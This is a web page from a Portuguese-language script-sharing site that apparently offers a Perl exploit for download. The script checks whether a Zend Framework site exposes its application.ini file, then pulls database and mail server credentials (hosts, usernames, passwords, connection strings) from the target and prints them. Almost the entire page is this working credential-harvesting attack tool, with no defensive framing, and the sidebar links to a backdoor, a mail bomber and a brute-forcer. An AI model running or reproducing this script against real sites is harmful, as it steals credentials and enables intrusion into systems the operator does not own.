Zend Framework application.ini vulnerability exploit

Publicado por Perfil removido (última atualização em 21/04/2014)

[ Hits: 33.870 ]

Download Zend_Exploit.pl




Perdoem meu inglês, kkk.

  



Esconder código-fonte

#!/usr/bin/perl

# Zend Framework Exploit.
# By KoubackTr
# koubacktr@gmail.com
# http://koubacktr.wordpress.com/


#=====================================================================#
# This script exploits a vulnerability in the Zend Framework          #
# Through the exposure of the configuration file "application.ini"    #
#=====================================================================#
# Este script explora uma vulnerabilidade no Zend Framework           #
# Atravez da exposição do arquivo de configuração "application.ini"   #
#=====================================================================#

# Status: Em teste e adaptação  // In test and adaptation


# Libs
use strict;
use LWP::UserAgent;
use Getopt::Long;
use Config;
use Term::ANSIColor;

my $os=$Config{osname};

if($os=="linux"){

}else{
print "Ohh, this software run only in linux systems :( [DIE]\n";
die;
}

print color 'bold cyan';
print '
__________                 .___         ____  ___      .__         ____  __
\____    /____   ____    __| _/    ____ \   \/  /_____ |  |   ____/_   |/  |_
  /     // __ \ /    \  / __ |   _/ __ \ \     /\____ \|  |  /  _ \|   \   __\
 /     /\  ___/|   |  \/ /_/ |   \  ___/ /     \|  |_> >  |_(  <_> )   ||  |
/_______ \___  >___|  /\____ |    \___  >___/\  \   __/|____/\____/|___||__|
        \/   \/     \/      \/        \/      \_/__|
by KoubackTr || http://koubacktr.wordpress.com/

';
print color 'reset';

my ($target, $zend_path);
my $options = GetOptions(
   't=s'=> \$target,
   'p=s'=> \$zend_path,
);

unless($target){
print color 'yellow';
print "\t\t\t[!] Please, set a Zend target!\n";
print "\t\t\tUse EX: $0 -t <target> -p <zend/path/>\n\n";
exit;
print color 'reset';

}
unless($zend_path){
 my $zend_path="/";
}

my $APP="application.ini";
my $PATH="application/configs";

my $URL="http://$target/$zend_path/$PATH/$APP"; #// make a complete URL of application.ini

my $u = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $URL);
my $resposta = $u->request($req);

if($resposta->is_success){

print color 'red';
print "\t\t\t[+] TARGET IS VULNERABLE !! :)\n";
print color 'reset';
print "\t\t\t[+] EXPLORE DB CONFIG IN FILE... !! :)\n\n";

#// using curl for requet application.ini

my $db_host= `curl -s "$URL" | grep 'db.params.host'`;
my $db_adapter=`curl -s "$URL" | grep 'db.adapter' `;
my $db_user=`curl -s "$URL" | grep '.db.params.username' `;
my $db_pass=`curl -s "$URL" | grep '.db.params.password' `;
my $db_name=`curl -s "$URL" | grep 'db.params.dbname' `;
my $db_geral=`curl -s "$URL"| grep 'connection_string' `;

#// Return and print config data
print color 'cyan';
print "\t$db_adapter \n";
print "\t$db_host    \n";
print "\t$db_user    \n";
print "\t$db_pass    \n";
print "\t$db_name    \n";
print "\n$db_geral   \n";
print color 'reset';

print "\n";
print "\t\t\t[+] EXPLORE MAIL CONFIG IN FILE... !! :)\n\n";


my $mail_type=`curl -s "$URL" | grep 'mail.transport.type' `;
my $mail_host= `curl -s "$URL" | grep 'mail.transport.host'`;
my $mail_port=`curl -s "$URL" | grep 'mail.transport.port' `;
my $mail_user=`curl -s "$URL" | grep '.mail.transport.username' `;
my $mail_pass=`curl -s "$URL" | grep 'mail.transport.password' `;

print color 'cyan';
print "\t$mail_type \n";
print "\t$mail_host    \n";
print "\t$mail_port    \n";
print "\t$mail_user    \n";
print "\t$mail_pass    \n";

print color 'reset';

print "\n\n END!\n";


# Make a new request for get new lines and configuration of file. :p
# ...

}
else{
#// The target is not vulnerable, sorry
print color 'bold green';
print "\t\t\t\n[!] TARGET IS NOT VULNERABLE :(  (BYE)\n\n";
print color 'reset';
}


# END #

#
#  KoubackTr - 2014 http://twitter.com/kouback_tr_
#  irc.anonnet.org 6667 #Loc
#

Scripts recomendados

Multi Brute Force

Mail bomber

Monitor do BO

Gerador de Senhas Aleatórias VERSÃO 2.0

Backdoor em perl


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts